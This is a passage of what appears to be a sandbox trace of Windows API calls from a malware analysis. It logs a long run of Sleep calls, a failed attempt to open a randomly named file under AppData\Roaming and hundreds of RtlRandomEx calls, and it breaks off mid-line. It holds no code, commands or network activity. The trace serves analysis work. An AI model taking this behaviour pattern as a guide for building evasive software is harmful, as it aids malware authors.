Sleep (dwMilliseconds=0x258) [0201.290] Sleep (dwMilliseconds=0x258) [0201.299] Sleep (dwMilliseconds=0x258) [0201.325] Sleep (dwMilliseconds=0x258) [0201.334] Sleep (dwMilliseconds=0x258) [0201.392] Sleep (dwMilliseconds=0x258) [0201.430] Sleep (dwMilliseconds=0x258) [0201.442] Sleep (dwMilliseconds=0x258) [0201.471] Sleep (dwMilliseconds=0x258) [0201.493] Sleep (dwMilliseconds=0x258) [0201.549] Sleep (dwMilliseconds=0x258) [0201.588] Sleep (dwMilliseconds=0x258) [0201.596] Sleep (dwMilliseconds=0x258) [0201.635] Sleep (dwMilliseconds=0x258) [0201.673] Sleep (dwMilliseconds=0x258) [0201.767] Sleep (dwMilliseconds=0x258) [0201.814] Sleep (dwMilliseconds=0x258) [0201.829] Sleep (dwMilliseconds=0x258) [0201.844] Sleep (dwMilliseconds=0x258) [0201.860] Sleep (dwMilliseconds=0x258) [0201.876] Sleep (dwMilliseconds=0x258) [0201.891] Sleep (dwMilliseconds=0x258) [0201.907] Sleep (dwMilliseconds=0x258) [0201.970] Sleep (dwMilliseconds=0x258) [0201.995] Sleep (dwMilliseconds=0x258) [0202.016] Sleep (dwMilliseconds=0x258) [0202.063] Sleep (dwMilliseconds=0x258) [0202.110] Sleep (dwMilliseconds=0x258) [0202.204] Sleep (dwMilliseconds=0x258) [0202.234] Sleep (dwMilliseconds=0x258) [0202.250] Sleep (dwMilliseconds=0x258) [0202.268] Sleep (dwMilliseconds=0x258) [0202.282] Sleep (dwMilliseconds=0x258) [0202.329] Sleep (dwMilliseconds=0x258) [0202.386] Sleep (dwMilliseconds=0x258) [0202.394] Sleep (dwMilliseconds=0x258) [0202.421] Sleep (dwMilliseconds=0x258) [0202.438] Sleep (dwMilliseconds=0x258) [0202.466] Sleep (dwMilliseconds=0x258) [0202.469] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x26) returned 0x97d2300 [0202.469] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a254fd1 [0202.469] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x101) returned 0x9a80080 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e055302 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3cfd189e [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf3cbd53 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7885f8e [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c2c8a15 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6a8ca260 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4885f5d7 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2325c200 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b9ff22b [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xdcdc1ca [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x173909b5 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x45787b6a [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x69606300 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a6eadcf [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x13ec28e5 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6561d293 [0202.469] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3a5e1ef4 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x403215e4 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d21d6a1 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ff3aedf [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47f4879a [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x392c8d67 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e14a16 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x75549f6 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15859886 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1689858 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ca1a514 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x653edbc4 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xde39b96 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x516c9a57 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7413ff2d [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64de4a43 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ed3a883 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x785d8b5c [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x739ef02a [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57109e46 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c603eb [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f2ced1d [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63dd681b [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x74dc1cfe [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x788cc416 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6cf0dabf [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4551bc7a [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e2b7a4c [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5dfd5106 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d12d201 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b1aff93 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x20971414 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5527fa48 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70ce76e5 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x36fce47a [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x117ba39a [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x454e7eed [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2258eda1 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x694efa15 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f7cd2c5 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x139ee867 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x34850787 [0202.470] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe970d67 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50e0e8f [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6931230b [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x543e65c8 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17f3dfc0 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x612590c9 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c3acf89 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c058570 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x662da497 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x238e290c [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x45bc4f11 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f8aded4 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ed31cbf [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4dc0bbf4 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6921c7dd [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x366c2a40 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc356dc4 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3145db95 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x54ad3bab [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3758a89f [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x220cb8e6 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x18726a3b [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3cd1de63 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4bd421ca [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x175419fe [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23c4ff0e [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61931c7a [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xd69fddd [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7874ffc4 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x34d37323 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11ce7 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1a210834 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x872c891 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x181a076a [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x48dfa12e [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c5b61f5 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4907791b [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x898f3c7 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b7ca5d7 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c00cc76 [0202.471] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x72ed6de0 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3a28ca37 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xec0f8ba [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x596ab430 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x60d4decb [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10f1f3e0 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x37b875e [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7926c2a1 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6437c724 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x670e9af [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x54ed0a19 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4fdbeb4 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x207b1310 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6ee518e8 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x76100815 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6baa1347 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c9b4654 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x19cd9e46 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2eba4977 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9168f43 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x302acf7a [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x595d143a [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4698c7f3 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe8c2638 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d150dca [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xdf8ac76 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b728f13 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70b8e382 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2a47a85b [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23fc1398 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6f62958 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5d797bd3 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x68f67511 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3634449f [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xfb94335 [0202.472] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61948bed [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x441702b6 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22305ef2 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x172c527c [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c69ed0c [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6694b69b [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x238c4a31 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78140d76 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb08d0b7 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c2610c2 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3cd01693 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c4a3fba [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4687f8e2 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7803ee07 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b3f893e [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66a54993 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26beef00 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14bea700 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa9841c1 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2756257f [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x377493a3 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x367f5457 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x53c9e9bd [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b465060 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x550e58f2 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b11793 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7bc98c54 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1cfd6929 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb2e6a9a [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b9dbccd [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2365c161 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f0dd15f [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x414b6030 [0202.473] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56b7748 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51255fd8 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14005319 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x775c96a1 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x36bc80ee [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xbbbb731 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x787ac863 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x524af926 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x123514dc [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1107470d [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x283c54d5 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x749a9081 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33066a8 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50a73338 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4efcda01 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d1f7300 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc62f04e [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x209eeb5e [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6d754ae0 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26e7c588 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x96c333b [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x73c5e4c8 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5993de1d [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xee8b94d [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x505da0a4 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x19e247f7 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50da4440 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64310f6 [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x36fce62b [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1bcd906e [0202.474] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64304d4a [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ce03f0f [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb8bd804 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x73a2f857 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2e21ded9 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x49b6619 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d866ed [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ccd1e50 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d3826d3 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c02fb29 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d9eaab9 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c7c36d3 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26e358e4 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6afe81b4 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ca56d5 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x318596c2 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2e16f062 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x766e82ad [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58cb3927 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x75cb7958 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x498b28cf [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x551e2689 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1cfbf36b [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x288a4bf7 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x483df76 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x716d1ddc [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x539e0076 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23a7ff22 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6821da0e [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x48e57795 [0202.475] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x243e47fa [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e300f5a [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c15e9a3 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x334d5229 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x569cf97b [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5a42533c [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32df6e39 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b7d6861 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6f06ccf1 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6a1c2cda [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe8a1bf4 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55084078 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x202d3abe [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6fbc1111 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7aab0830 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64233d2 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9c1e8d7 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62c784a0 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6672345e [0202.476] RtlRandomEx (in: 